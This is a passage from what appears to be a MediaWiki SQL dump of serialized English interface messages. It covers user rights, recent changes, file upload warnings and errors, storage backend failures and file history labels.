limits\";'),('en','messages:right-bot','s:34:\"Be treated as an automated process\";'),('en','messages:right-nominornewtalk','s:72:\"Not have minor edits to discussion pages trigger the new messages prompt\";'),('en','messages:right-apihighlimits','s:32:\"Use higher limits in API queries\";'),('en','messages:right-writeapi','s:20:\"Use of the write API\";'),('en','messages:right-delete','s:12:\"Delete pages\";'),('en','messages:right-bigdelete','s:33:\"Delete pages with large histories\";'),('en','messages:right-deletelogentry','s:40:\"Delete and undelete specific log entries\";'),('en','messages:right-deleterevision','s:47:\"Delete and undelete specific revisions of pages\";'),('en','messages:right-deletedhistory','s:59:\"View deleted history entries, without their associated text\";'),('en','messages:right-deletedtext','s:55:\"View deleted text and changes between deleted revisions\";'),('en','messages:right-browsearchive','s:20:\"Search deleted pages\";'),('en','messages:right-undelete','s:15:\"Undelete a page\";'),('en','messages:right-suppressrevision','s:63:\"View, hide and unhide specific revisions of pages from any user\";'),('en','messages:right-viewsuppressed','s:35:\"View revisions hidden from any user\";'),('en','messages:right-suppressionlog','s:17:\"View private logs\";'),('en','messages:right-block','s:30:\"Block other users from editing\";'),('en','messages:right-blockemail','s:31:\"Block a user from sending email\";'),('en','messages:right-hideuser','s:43:\"Block a username, hiding it from the public\";'),('en','messages:right-ipblock-exempt','s:46:\"Bypass IP blocks, auto-blocks and range blocks\";'),('en','messages:right-proxyunbannable','s:34:\"Bypass automatic blocks of proxies\";'),('en','messages:right-unblockself','s:15:\"Unblock oneself\";'),('en','messages:right-protect','s:57:\"Change protection levels and edit cascade-protected pages\";'),('en','messages:right-editprotected','s:53:\"Edit pages protected as \"{{int:protect-level-sysop}}\"\";'),('en','messages:right-editsemiprotected','s:61:\"Edit pages protected as \"{{int:protect-level-autoconfirmed}}\"\";'),('en','messages:right-editcontentmodel','s:32:\"Edit the content model of a page\";'),('en','messages:right-editinterface','s:23:\"Edit the user interface\";'),('en','messages:right-editusercssjs','s:42:\"Edit other users\' CSS and JavaScript files\";'),('en','messages:right-editusercss','s:27:\"Edit other users\' CSS files\";'),('en','messages:right-edituserjs','s:34:\"Edit other users\' JavaScript files\";'),('en','messages:right-editmyusercss','s:28:\"Edit your own user CSS files\";'),('en','messages:right-editmyuserjs','s:35:\"Edit your own user JavaScript files\";'),('en','messages:right-viewmywatchlist','s:23:\"View your own watchlist\";'),('en','messages:right-editmywatchlist','s:88:\"Edit your own watchlist. Note some actions will still add pages even without this right.\";'),('en','messages:right-viewmyprivateinfo','s:58:\"View your own private data (e.g. email address, real name)\";'),('en','messages:right-editmyprivateinfo','s:58:\"Edit your own private data (e.g. email address, real name)\";'),('en','messages:right-editmyoptions','s:25:\"Edit your own preferences\";'),('en','messages:right-rollback','s:72:\"Quickly rollback the edits of the last user who edited a particular page\";'),('en','messages:right-markbotedits','s:35:\"Mark rolled-back edits as bot edits\";'),('en','messages:right-noratelimit','s:30:\"Not be affected by rate limits\";'),('en','messages:right-import','s:29:\"Import pages from other wikis\";'),('en','messages:right-importupload','s:31:\"Import pages from a file upload\";'),('en','messages:right-patrol','s:31:\"Mark others\' edits as patrolled\";'),('en','messages:right-autopatrol','s:54:\"Have one\'s own edits automatically marked as patrolled\";'),('en','messages:right-patrolmarks','s:32:\"View recent changes patrol marks\";'),('en','messages:right-unwatchedpages','s:30:\"View a list of unwatched pages\";'),('en','messages:right-mergehistory','s:26:\"Merge the history of pages\";'),('en','messages:right-userrights','s:20:\"Edit all user rights\";'),('en','messages:right-userrights-interwiki','s:40:\"Edit user rights of users on other wikis\";'),('en','messages:right-siteadmin','s:28:\"Lock and unlock the database\";'),('en','messages:right-override-export-depth','s:54:\"Export pages including linked pages up to a depth of 5\";'),('en','messages:right-sendemail','s:25:\"Send email to other users\";'),('en','messages:right-passwordreset','s:26:\"View password reset emails\";'),('en','messages:newuserlogpage','s:17:\"User creation log\";'),('en','messages:newuserlogpagetext','s:32:\"This is a log of user creations.\";'),('en','messages:rightslog','s:15:\"User rights log\";'),('en','messages:rightslogtext','s:40:\"This is a log of changes to user rights.\";'),('en','messages:action-read','s:14:\"read this page\";'),('en','messages:action-edit','s:14:\"edit this page\";'),('en','messages:action-createpage','s:12:\"create pages\";'),('en','messages:action-createtalk','s:23:\"create discussion pages\";'),('en','messages:action-createaccount','s:24:\"create this user account\";'),('en','messages:action-history','s:29:\"view the history of this page\";'),('en','messages:action-minoredit','s:23:\"mark this edit as minor\";'),('en','messages:action-move','s:14:\"move this page\";'),('en','messages:action-move-subpages','s:32:\"move this page, and its subpages\";'),('en','messages:action-move-rootuserpages','s:20:\"move root user pages\";'),('en','messages:action-move-categorypages','s:19:\"move category pages\";'),('en','messages:action-movefile','s:14:\"move this file\";'),('en','messages:action-upload','s:16:\"upload this file\";'),('en','messages:action-reupload','s:28:\"overwrite this existing file\";'),('en','messages:action-reupload-shared','s:41:\"override this file on a shared repository\";'),('en','messages:action-upload_by_url','s:27:\"upload this file from a URL\";'),('en','messages:action-writeapi','s:17:\"use the write API\";'),('en','messages:action-delete','s:16:\"delete this page\";'),('en','messages:action-deleterevision','s:20:\"delete this revision\";'),('en','messages:action-deletedhistory','s:32:\"view this page\'s deleted history\";'),('en','messages:action-browsearchive','s:20:\"search deleted pages\";'),('en','messages:action-undelete','s:18:\"undelete this page\";'),('en','messages:action-suppressrevision','s:39:\"review and restore this hidden revision\";'),('en','messages:action-suppressionlog','s:21:\"view this private log\";'),('en','messages:action-block','s:28:\"block this user from editing\";'),('en','messages:action-protect','s:38:\"change protection levels for this page\";'),('en','messages:action-rollback','s:72:\"quickly rollback the edits of the last user who edited a particular page\";'),('en','messages:action-import','s:30:\"import pages from another wiki\";'),('en','messages:action-importupload','s:31:\"import pages from a file upload\";'),('en','messages:action-patrol','s:31:\"mark others\' edits as patrolled\";'),('en','messages:action-autopatrol','s:34:\"have your edit marked as patrolled\";'),('en','messages:action-unwatchedpages','s:32:\"view the list of unwatched pages\";'),('en','messages:action-mergehistory','s:30:\"merge the history of this page\";'),('en','messages:action-userrights','s:20:\"edit all user rights\";'),('en','messages:action-userrights-interwiki','s:40:\"edit user rights of users on other wikis\";'),('en','messages:action-siteadmin','s:27:\"lock or unlock the database\";'),('en','messages:action-sendemail','s:11:\"send emails\";'),('en','messages:action-editmywatchlist','s:19:\"edit your watchlist\";'),('en','messages:action-viewmywatchlist','s:19:\"view your watchlist\";'),('en','messages:action-viewmyprivateinfo','s:29:\"view your private information\";'),('en','messages:action-editmyprivateinfo','s:29:\"edit your private information\";'),('en','messages:action-editcontentmodel','s:32:\"edit the content model of a page\";'),('en','messages:nchanges','s:31:\"$1 {{PLURAL:$1|change|changes}}\";'),('en','messages:enhancedrc-since-last-visit','s:33:\"$1 {{PLURAL:$1|since last visit}}\";'),('en','messages:enhancedrc-history','s:7:\"history\";'),('en','messages:recentchanges','s:14:\"Recent changes\";'),('en','messages:recentchanges-url','s:21:\"Special:RecentChanges\";'),('en','messages:recentchanges-legend','s:22:\"Recent changes options\";'),('en','messages:recentchanges-summary','s:55:\"Track the most recent changes to the wiki on this page.\";'),('en','messages:recentchangestext','s:1:\"-\";'),('en','messages:recentchanges-noresult','s:59:\"No changes during the given period matching these criteria.\";'),('en','messages:recentchanges-feed-description','s:55:\"Track the most recent changes to the wiki in this feed.\";'),('en','messages:recentchanges-label-newpage','s:28:\"This edit created a new page\";'),('en','messages:recentchanges-label-minor','s:20:\"This is a minor edit\";'),('en','messages:recentchanges-label-bot','s:32:\"This edit was performed by a bot\";'),('en','messages:recentchanges-label-unpatrolled','s:36:\"This edit has not yet been patrolled\";'),('en','messages:recentchanges-label-plusminus','s:45:\"The page size changed by this number of bytes\";'),('en','messages:recentchanges-legend-heading','s:13:\"\'\'\'Legend:\'\'\'\";'),('en','messages:recentchanges-legend-newpage','s:85:\"{{int:recentchanges-label-newpage}} (also see [[Special:NewPages|list of new pages]])\";'),('en','messages:recentchanges-legend-minor','s:33:\"{{int:recentchanges-label-minor}}\";'),('en','messages:recentchanges-legend-bot','s:31:\"{{int:recentchanges-label-bot}}\";'),('en','messages:recentchanges-legend-unpatrolled','s:39:\"{{int:recentchanges-label-unpatrolled}}\";'),('en','messages:recentchanges-legend-plusminus','s:16:\"(±123)\";'),('en','messages:rcnotefrom','s:114:\"Below {{PLURAL:$5|is the change|are the changes}} since $3, $4 (up to $1 shown).\";'),('en','messages:rclistfrom','s:37:\"Show new changes starting from $2, $3\";'),('en','messages:rcshowhideminor','s:14:\"$1 minor edits\";'),('en','messages:rcshowhideminor-show','s:4:\"Show\";'),('en','messages:rcshowhideminor-hide','s:4:\"Hide\";'),('en','messages:rcshowhidebots','s:7:\"$1 bots\";'),('en','messages:rcshowhidebots-show','s:4:\"Show\";'),('en','messages:rcshowhidebots-hide','s:4:\"Hide\";'),('en','messages:rcshowhideliu','s:19:\"$1 registered users\";'),('en','messages:rcshowhideliu-show','s:4:\"Show\";'),('en','messages:rcshowhideliu-hide','s:4:\"Hide\";'),('en','messages:rcshowhideanons','s:18:\"$1 anonymous users\";'),('en','messages:rcshowhideanons-show','s:4:\"Show\";'),('en','messages:rcshowhideanons-hide','s:4:\"Hide\";'),('en','messages:rcshowhidepatr','s:18:\"$1 patrolled edits\";'),('en','messages:rcshowhidepatr-show','s:4:\"Show\";'),('en','messages:rcshowhidepatr-hide','s:4:\"Hide\";'),('en','messages:rcshowhidemine','s:11:\"$1 my edits\";'),('en','messages:rcshowhidemine-show','s:4:\"Show\";'),('en','messages:rcshowhidemine-hide','s:4:\"Hide\";'),('en','messages:rclinks','s:44:\"Show last $1 changes in last $2 days
                                                                $3\";'),('en','messages:diff','s:4:\"diff\";'),('en','messages:hist','s:4:\"hist\";'),('en','messages:hide','s:4:\"Hide\";'),('en','messages:show','s:4:\"Show\";'),('en','messages:minoreditletter','s:1:\"m\";'),('en','messages:newpageletter','s:1:\"N\";'),('en','messages:boteditletter','s:1:\"b\";'),('en','messages:unpatrolledletter','s:1:\"!\";'),('en','messages:number_of_watching_users_RCview','s:4:\"[$1]\";'),('en','messages:number_of_watching_users_pageview','s:38:\"[$1 watching {{PLURAL:$1|user|users}}]\";'),('en','messages:rc_categories','s:39:\"Limit to categories (separate with \"|\")\";'),('en','messages:rc_categories_any','s:3:\"Any\";'),('en','messages:rc-change-size','s:2:\"$1\";'),('en','messages:rc-change-size-new','s:40:\"$1 {{PLURAL:$1|byte|bytes}} after change\";'),('en','messages:newsectionsummary','s:20:\"/* $1 */ new section\";'),('en','messages:rc-enhanced-expand','s:12:\"Show details\";'),('en','messages:rc-enhanced-hide','s:12:\"Hide details\";'),('en','messages:rc-old-title','s:26:\"originally created as \"$1\"\";'),('en','messages:recentchangeslinked','s:15:\"Related changes\";'),('en','messages:recentchangeslinked-feed','s:15:\"Related changes\";'),('en','messages:recentchangeslinked-toolbox','s:15:\"Related changes\";'),('en','messages:recentchangeslinked-title','s:23:\"Changes related to \"$1\"\";'),('en','messages:recentchangeslinked-summary','s:191:\"This is a list of changes made recently to pages linked from a specified page (or to members of a specified category).\nPages on [[Special:Watchlist|your watchlist]] are bold.\";'),('en','messages:recentchangeslinked-page','s:10:\"Page name:\";'),('en','messages:recentchangeslinked-to','s:54:\"Show changes to pages linked to the given page instead\";'),('en','messages:upload','s:11:\"Upload file\";'),('en','messages:uploadbtn','s:11:\"Upload file\";'),('en','messages:reuploaddesc','s:43:\"Cancel upload and return to the upload form\";'),('en','messages:upload-tryagain','s:32:\"Submit modified file description\";'),('en','messages:uploadnologin','s:13:\"Not logged in\";'),('en','messages:uploadnologintext','s:26:\"Please $1 to upload files.\";'),('en','messages:upload_directory_missing','s:79:\"The upload directory ($1) is missing and could not be created by the webserver.\";'),('en','messages:upload_directory_read_only','s:59:\"The upload directory ($1) is not writable by the webserver.\";'),('en','messages:uploaderror','s:12:\"Upload error\";'),('en','messages:upload-summary','s:0:\"\";'),('en','messages:upload-recreate-warning','s:148:\"Warning: A file by that name has been deleted or moved.\n\nThe deletion and move log for this page are provided here for convenience:\";'),('en','messages:uploadtext','s:820:\"Use the form below to upload files.\nTo view or search previously uploaded files go to the [[Special:FileList|list of uploaded files]], (re)uploads are also logged in the [[Special:Log/upload|upload log]], deletions in the [[Special:Log/delete|deletion log]].\n\nTo include a file in a page, use a link in one of the following forms:\n* [[{{ns:file}}:File.jpg]] to use the full version of the file\n* [[{{ns:file}}:File.png|200px|thumb|left|alt text]] to use a 200 pixel wide rendition in a box in the left margin with \"alt text\" as description\n* [[{{ns:media}}:File.ogg]] for directly linking to the file without displaying the file\";'),('en','messages:upload-permitted','s:25:\"Permitted file types: $1.\";'),('en','messages:upload-preferred','s:25:\"Preferred file types: $1.\";'),('en','messages:upload-prohibited','s:26:\"Prohibited file types: $1.\";'),('en','messages:uploadfooter','s:1:\"-\";'),('en','messages:upload-default-description','s:1:\"-\";'),('en','messages:uploadlogpage','s:10:\"Upload log\";'),('en','messages:uploadlogpagetext','s:126:\"Below is a list of the most recent file uploads.\nSee the [[Special:NewFiles|gallery of new files]] for a more visual overview.\";'),('en','messages:filename','s:8:\"Filename\";'),('en','messages:filedesc','s:7:\"Summary\";'),('en','messages:fileuploadsummary','s:8:\"Summary:\";'),('en','messages:filereuploadsummary','s:13:\"File changes:\";'),('en','messages:filestatus','s:17:\"Copyright status:\";'),('en','messages:filesource','s:7:\"Source:\";'),('en','messages:ignorewarning','s:35:\"Ignore warning and save file anyway\";'),('en','messages:ignorewarnings','s:19:\"Ignore any warnings\";'),('en','messages:minlength1','s:38:\"Filenames must be at least one letter.\";'),('en','messages:illegalfilename','s:125:\"The filename \"$1\" contains characters that are not allowed in page titles.\nPlease rename the file and try uploading it again.\";'),('en','messages:filename-toolong','s:43:\"Filenames may not be longer than 240 bytes.\";'),('en','messages:badfilename','s:34:\"Filename has been changed to \"$1\".\";'),('en','messages:filetype-mime-mismatch','s:76:\"File extension \".$1\" does not match the detected MIME type of the file ($2).\";'),('en','messages:filetype-badmime','s:59:\"Files of the MIME type \"$1\" are not allowed to be uploaded.\";'),('en','messages:filetype-bad-ie-mime','s:133:\"Cannot upload this file because Internet Explorer would detect it as \"$1\", which is a disallowed and potentially dangerous file type.\";'),('en','messages:filetype-unwanted-type','s:104:\"\".$1\" is an unwanted file type.\nPreferred {{PLURAL:$3|file type is|file types are}} $2.\";'),('en','messages:filetype-banned-type','s:151:\"\".$1\" {{PLURAL:$4|is not a permitted file type|are not permitted file types}}.\nPermitted {{PLURAL:$3|file type is|file types are}} $2.\";'),('en','messages:filetype-missing','s:40:\"The file has no extension (like \".jpg\").\";'),('en','messages:empty-file','s:33:\"The file you submitted was empty.\";'),('en','messages:file-too-large','s:37:\"The file you submitted was too large.\";'),('en','messages:filename-tooshort','s:26:\"The filename is too short.\";'),('en','messages:filetype-banned','s:28:\"This type of file is banned.\";'),('en','messages:verification-error','s:41:\"This file did not pass file verification.\";'),('en','messages:hookaborted','s:63:\"The modification you tried to make was aborted by an extension.\";'),('en','messages:illegal-filename','s:28:\"The filename is not allowed.\";'),('en','messages:overwrite','s:44:\"Overwriting an existing file is not allowed.\";'),('en','messages:unknown-error','s:26:\"An unknown error occurred.\";'),('en','messages:tmp-create-error','s:32:\"Could not create temporary file.\";'),('en','messages:tmp-write-error','s:29:\"Error writing temporary file.\";'),('en','messages:large-file','s:68:\"It is recommended that files are no larger than $1;\nthis file is $2.\";'),('en','messages:largefileserver','s:59:\"This file is bigger than the server is configured to allow.\";'),('en','messages:emptyfile','s:143:\"The file you uploaded seems to be empty.\nThis might be due to a typo in the filename.\nPlease check whether you really want to upload this file.\";'),('en','messages:windows-nonascii-filename','s:61:\"This wiki does not support filenames with special characters.\";'),('en','messages:fileexists','s:146:\"A file with this name exists already, please check [[:$1]] if {{GENDER:|you}} are not sure if you want to change it.\n[[$1|thumb]]\";'),('en','messages:filepageexists','s:279:\"The description page for this file has already been created at [[:$1]], but no file with this name currently exists.\nThe summary you enter will not appear on the description page.\nTo make your summary appear there, you will need to manually edit it.\n[[$1|thumb]]\";'),('en','messages:fileexists-extension','s:208:\"A file with a similar name exists: [[$2|thumb]]\n* Name of the uploading file: [[:$1]]\n* Name of the existing file: [[:$2]]\nDo you perhaps want to use a more distinctive name?\";'),('en','messages:fileexists-thumbnail-yes','s:233:\"The file seems to be an image of reduced size (thumbnail).\n[[$1|thumb]]\nPlease check the file [[:$1]].\nIf the checked file is the same image of original size it is not necessary to upload an extra thumbnail.\";'),('en','messages:file-thumbnail-no','s:204:\"The filename begins with $1.\nIt seems to be an image of reduced size (thumbnail).\nIf you have this image in full resolution upload this one, otherwise change the filename please.\";'),('en','messages:fileexists-forbidden','s:166:\"A file with this name already exists, and cannot be overwritten.\nIf you still want to upload your file, please go back and use a new name.\n[[File:$1|thumb|center|$1]]\";'),('en','messages:fileexists-shared-forbidden','s:169:\"A file with this name exists already in the shared file repository.\nIf you still want to upload your file, please go back and use a new name.\n[[File:$1|thumb|center|$1]]\";'),('en','messages:file-exists-duplicate','s:67:\"This file is a duplicate of the following {{PLURAL:$1|file|files}}:\";'),('en','messages:file-deleted-duplicate','s:149:\"A file identical to this file ([[:$1]]) has previously been deleted.\nYou should check that file\'s deletion history before proceeding to re-upload it.\";'),('en','messages:file-deleted-duplicate-notitle','s:221:\"A file identical to this file has previously been deleted, and the title has been suppressed.\nYou should ask someone with the ability to view suppressed file data to review the situation before proceeding to re-upload it.\";'),('en','messages:uploadwarning','s:14:\"Upload warning\";'),('en','messages:uploadwarning-text','s:55:\"Please modify the file description below and try again.\";'),('en','messages:savefile','s:9:\"Save file\";'),('en','messages:uploadedimage','s:17:\"uploaded \"[[$1]]\"\";'),('en','messages:overwroteimage','s:34:\"uploaded a new version of \"[[$1]]\"\";'),('en','messages:uploaddisabled','s:17:\"Uploads disabled.\";'),('en','messages:copyuploaddisabled','s:23:\"Upload by URL disabled.\";'),('en','messages:uploaddisabledtext','s:26:\"File uploads are disabled.\";'),('en','messages:php-uploaddisabledtext','s:72:\"File uploads are disabled in PHP.\nPlease check the file_uploads setting.\";'),('en','messages:uploadscripted','s:92:\"This file contains HTML or script code that may be erroneously interpreted by a web browser.\";'),('en','messages:uploadscriptednamespace','s:49:\"This SVG file contains an illegal namespace \"$1\".\";'),('en','messages:uploadinvalidxml','s:49:\"The XML in the uploaded file could not be parsed.\";'),('en','messages:uploadvirus','s:38:\"The file contains a virus!\nDetails: $1\";'),('en','messages:uploadjava','s:153:\"The file is a ZIP file that contains a Java .class file.\nUploading Java files is not allowed because they can cause security restrictions to be bypassed.\";'),('en','messages:upload-source','s:11:\"Source file\";'),('en','messages:sourcefilename','s:16:\"Source filename:\";'),('en','messages:sourceurl','s:11:\"Source URL:\";'),('en','messages:destfilename','s:21:\"Destination filename:\";'),('en','messages:upload-maxfilesize','s:21:\"Maximum file size: $1\";'),('en','messages:upload-description','s:16:\"File description\";'),('en','messages:upload-options','s:14:\"Upload options\";'),('en','messages:watchthisupload','s:15:\"Watch this file\";'),('en','messages:filewasdeleted','s:136:\"A file of this name has been previously uploaded and subsequently deleted.\nYou should check the $1 before proceeding to upload it again.\";'),('en','messages:filename-bad-prefix','s:211:\"The name of the file you are uploading begins with \"$1\", which is a non-descriptive name typically assigned automatically by digital cameras.\nPlease choose a more descriptive name for your file.\";'),('en','messages:filename-prefix-blacklist','s:431:\" #
                                                                \n# Syntax is as follows:\n#   * Everything from a \"#\" character to the end of the line is a comment\n#   * Every non-blank line is a prefix for typical filenames assigned automatically by digital cameras\nCIMG # Casio\nDSC_ # Nikon\nDSCF # Fuji\nDSCN # Nikon\nDUW # some mobile phones\nIMG # generic\nJD # Jenoptik\nMGP # Pentax\nPICT # misc.\n #
                                                                \";'),('en','messages:upload-success-subj','s:17:\"Successful upload\";'),('en','messages:upload-success-msg','s:79:\"Your upload from [$2] was successful. It is available here: [[:{{ns:file}}:$1]]\";'),('en','messages:upload-failure-subj','s:14:\"Upload problem\";'),('en','messages:upload-failure-msg','s:51:\"There was a problem with your upload from [$2]:\n\n$1\";'),('en','messages:upload-warning-subj','s:14:\"Upload warning\";'),('en','messages:upload-warning-msg','s:134:\"There was a problem with your upload from [$2]. You may return to the [[Special:Upload/stash/$1|upload form]] to correct this problem.\";'),('en','messages:upload-proto-error','s:18:\"Incorrect protocol\";'),('en','messages:upload-proto-error-text','s:87:\"Remote upload requires URLs beginning with http:// or ftp://.\";'),('en','messages:upload-file-error','s:14:\"Internal error\";'),('en','messages:upload-file-error-text','s:145:\"An internal error occurred when attempting to create a temporary file on the server.\nPlease contact an [[Special:ListUsers/sysop|administrator]].\";'),('en','messages:upload-misc-error','s:20:\"Unknown upload error\";'),('en','messages:upload-misc-error-text','s:189:\"An unknown error occurred during the upload.\nPlease verify that the URL is valid and accessible and try again.\nIf the problem persists, contact an [[Special:ListUsers/sysop|administrator]].\";'),('en','messages:upload-too-many-redirects','s:36:\"The URL contained too many redirects\";'),('en','messages:upload-http-error','s:26:\"An HTTP error occurred: $1\";'),('en','messages:upload-copy-upload-invalid-domain','s:48:\"Copy uploads are not available from this domain.\";'),('en','messages:backend-fail-stream','s:27:\"Could not stream file \"$1\".\";'),('en','messages:backend-fail-backup','s:27:\"Could not backup file \"$1\".\";'),('en','messages:backend-fail-notexists','s:27:\"The file $1 does not exist.\";'),('en','messages:backend-fail-hashes','s:41:\"Could not get file hashes for comparison.\";'),('en','messages:backend-fail-notsame','s:44:\"A non-identical file already exists at \"$1\".\";'),('en','messages:backend-fail-invalidpath','s:33:\"\"$1\" is not a valid storage path.\";'),('en','messages:backend-fail-delete','s:27:\"Could not delete file \"$1\".\";'),('en','messages:backend-fail-describe','s:40:\"Could not change metadata for file \"$1\".\";'),('en','messages:backend-fail-alreadyexists','s:29:\"The file \"$1\" already exists.\";'),('en','messages:backend-fail-store','s:34:\"Could not store file \"$1\" at \"$2\".\";'),('en','messages:backend-fail-copy','s:33:\"Could not copy file \"$1\" to \"$2\".\";'),('en','messages:backend-fail-move','s:33:\"Could not move file \"$1\" to \"$2\".\";'),('en','messages:backend-fail-opentemp','s:30:\"Could not open temporary file.\";'),('en','messages:backend-fail-writetemp','s:34:\"Could not write to temporary file.\";'),('en','messages:backend-fail-closetemp','s:31:\"Could not close temporary file.\";'),('en','messages:backend-fail-read','s:25:\"Could not read file \"$1\".\";'),('en','messages:backend-fail-create','s:26:\"Could not write file \"$1\".\";'),('en','messages:backend-fail-maxsize','s:84:\"Could not write file \"$1\" because it is larger than {{PLURAL:$2|one byte|$2 bytes}}.\";'),('en','messages:backend-fail-readonly','s:83:\"The storage backend \"$1\" is currently read-only. The reason given is: \"$2\"\";'),('en','messages:backend-fail-synced','s:78:\"The file \"$1\" is in an inconsistent state within the internal storage backends\";'),('en','messages:backend-fail-connect','s:42:\"Could not connect to storage backend \"$1\".\";'),('en','messages:backend-fail-internal','s:50:\"An unknown error occurred in storage backend \"$1\".\";'),('en','messages:backend-fail-contenttype','s:66:\"Could not determine the content type of the file to store at \"$1\".\";'),('en','messages:backend-fail-batchsize','s:136:\"The storage backend was given a batch of $1 file {{PLURAL:$1|operation|operations}}; the limit is $2 {{PLURAL:$2|operation|operations}}.\";'),('en','messages:backend-fail-usable','s:100:\"Could not read or write file \"$1\" due to insufficient permissions or missing directories/containers.\";'),('en','messages:filejournal-fail-dbconnect','s:67:\"Could not connect to the journal database for storage backend \"$1\".\";'),('en','messages:filejournal-fail-dbquery','s:63:\"Could not update the journal database for storage backend \"$1\".\";'),('en','messages:lockmanager-notlocked','s:40:\"Could not unlock \"$1\"; it is not locked.\";'),('en','messages:lockmanager-fail-closelock','s:35:\"Could not close lock file for \"$1\".\";'),('en','messages:lockmanager-fail-deletelock','s:36:\"Could not delete lock file for \"$1\".\";'),('en','messages:lockmanager-fail-acquirelock','s:32:\"Could not acquire lock for \"$1\".\";'),('en','messages:lockmanager-fail-openlock','s:34:\"Could not open lock file for \"$1\".\";'),('en','messages:lockmanager-fail-releaselock','s:32:\"Could not release lock for \"$1\".\";'),('en','messages:lockmanager-fail-db-bucket','s:53:\"Could not contact enough lock databases in bucket $1.\";'),('en','messages:lockmanager-fail-db-release','s:39:\"Could not release locks on database $1.\";'),('en','messages:lockmanager-fail-svr-acquire','s:37:\"Could not acquire locks on server $1.\";'),('en','messages:lockmanager-fail-svr-release','s:37:\"Could not release locks on server $1.\";'),('en','messages:zip-file-open-error','s:62:\"An error was encountered when opening the file for ZIP checks.\";'),('en','messages:zip-wrong-format','s:38:\"The specified file was not a ZIP file.\";'),('en','messages:zip-bad','s:99:\"The file is a corrupt or otherwise unreadable ZIP file.\nIt cannot be properly checked for security.\";'),('en','messages:zip-unsupported','s:117:\"The file is a ZIP file that uses ZIP features not supported by MediaWiki.\nIt cannot be properly checked for security.\";'),('en','messages:uploadstash','s:12:\"Upload stash\";'),('en','messages:uploadstash-summary','s:193:\"This page provides access to files that are uploaded or in the process of uploading, but are not yet published to the wiki. These files are not visible to anyone but the user who uploaded them.\";'),('en','messages:uploadstash-clear','s:19:\"Clear stashed files\";'),('en','messages:uploadstash-nofiles','s:26:\"You have no stashed files.\";'),('en','messages:uploadstash-badtoken','s:104:\"Performing of that action was unsuccessful, perhaps because your editing credentials expired. Try again.\";'),('en','messages:uploadstash-errclear','s:36:\"Clearing the files was unsuccessful.\";'),('en','messages:uploadstash-refresh','s:25:\"Refresh the list of files\";'),('en','messages:invalid-chunk-offset','s:20:\"Invalid chunk offset\";'),('en','messages:img-auth-accessdenied','s:13:\"Access denied\";'),('en','messages:img-auth-nopathinfo','s:201:\"Missing PATH_INFO.\nYour server is not set up to pass this information.\nIt may be CGI-based and cannot support img_auth.\nSee https://www.mediawiki.org/wiki/Special:MyLanguage/Manual:Image_Authorization.\";'),('en','messages:img-auth-notindir','s:57:\"Requested path is not in the configured upload directory.\";'),('en','messages:img-auth-badtitle','s:44:\"Unable to construct a valid title from \"$1\".\";'),('en','messages:img-auth-nologinnWL','s:55:\"You are not logged in and \"$1\" is not in the whitelist.\";'),('en','messages:img-auth-nofile','s:25:\"File \"$1\" does not exist.\";'),('en','messages:img-auth-isdir','s:71:\"You are trying to access a directory \"$1\".\nOnly file access is allowed.\";'),('en','messages:img-auth-streaming','s:15:\"Streaming \"$1\".\";'),('en','messages:img-auth-public','s:158:\"The function of img_auth.php is to output files from a private wiki.\nThis wiki is configured as a public wiki.\nFor optimal security, img_auth.php is disabled.\";'),('en','messages:img-auth-noread','s:39:\"User does not have access to read \"$1\".\";'),('en','messages:http-invalid-url','s:15:\"Invalid URL: $1\";'),('en','messages:http-invalid-scheme','s:44:\"URLs with the \"$1\" scheme are not supported.\";'),('en','messages:http-request-error','s:41:\"HTTP request failed due to unknown error.\";'),('en','messages:http-read-error','s:16:\"HTTP read error.\";'),('en','messages:http-timed-out','s:23:\"HTTP request timed out.\";'),('en','messages:http-curl-error','s:22:\"Error fetching URL: $1\";'),('en','messages:http-bad-status','s:50:\"There was a problem during the HTTP request: $1 $2\";'),('en','messages:upload-curl-error6','s:19:\"Could not reach URL\";'),('en','messages:upload-curl-error6-text','s:102:\"The URL provided could not be reached.\nPlease double-check that the URL is correct and the site is up.\";'),('en','messages:upload-curl-error28','s:14:\"Upload timeout\";'),('en','messages:upload-curl-error28-text','s:138:\"The site took too long to respond.\nPlease check the site is up, wait a short while and try again.\nYou may want to try at a less busy time.\";'),('en','messages:license','s:10:\"Licensing:\";'),('en','messages:license-header','s:9:\"Licensing\";'),('en','messages:nolicense','s:13:\"None selected\";'),('en','messages:licenses','s:1:\"-\";'),('en','messages:licenses-edit','s:20:\"Edit license options\";'),('en','messages:license-nopreview','s:23:\"(Preview not available)\";'),('en','messages:upload_source_url','s:56:\"(your chosen file from a valid, publicly accessible URL)\";'),('en','messages:upload_source_file','s:37:\"(your chosen file from your computer)\";'),('en','messages:listfiles-delete','s:6:\"delete\";'),('en','messages:listfiles-summary','s:43:\"This special page shows all uploaded files.\";'),('en','messages:listfiles_search_for','s:22:\"Search for media name:\";'),('en','messages:imgfile','s:4:\"file\";'),('en','messages:listfiles','s:9:\"File list\";'),('en','messages:listfiles_thumb','s:9:\"Thumbnail\";'),('en','messages:listfiles_date','s:4:\"Date\";'),('en','messages:listfiles_name','s:4:\"Name\";'),('en','messages:listfiles_user','s:4:\"User\";'),('en','messages:listfiles_size','s:4:\"Size\";'),('en','messages:listfiles_description','s:11:\"Description\";'),('en','messages:listfiles_count','s:8:\"Versions\";'),('en','messages:listfiles-show-all','s:30:\"Include old versions of images\";'),('en','messages:listfiles-latestversion','s:15:\"Current version\";'),('en','messages:listfiles-latestversion-yes','s:3:\"Yes\";'),('en','messages:listfiles-latestversion-no','s:2:\"No\";'),('en','messages:file-anchor-link','s:4:\"File\";'),('en','messages:filehist','s:12:\"File history\";'),('en','messages:filehist-help','s:66:\"Click on a date/time to view the file as it appeared at that time.\";'),('en','messages:filehist-deleteall','s:10:\"delete all\";'),('en','messages:filehist-deleteone','s:6:\"delete\";'),('en','messages:filehist-revert','s:6:\"revert\";'),('en','messages:filehist-current','s:7:\"current\";'),('en','messages:filehist-datetime','s:9:\"Date/Time\";'),('en','messages:filehist-thumb','s:9:\"Thumbnail\";'),('en','messages:filehist-thumbtext','s:30:\"Thumbnail for version as of $1\";'),('en','messages:filehist-nothumb','s:12:\"No thumbnail\";'),('en','messages:filehist-user','s:4:\"User\";'),('en','messages:filehist-dimensions','s:10:\"Dimensions\";'),('en','messages:filehist-filesize','s:9:\"File size\";'),('en','messages:filehist-comment','s:7:\"Comment\";'),('en','messages:imagelinks','s:10:\"File usage\";'),('en','messages:linkstoimage','s:66:\"The following {{PLURAL:$1|page links|$1 pages link}} to this file:\";'),('en','messages:linkstoimage-more','s:215:\"More than $1 {{PLURAL:$1|page links|pages link}} to this file.\nThe following list shows the {{PLURAL:$1|first page link|first 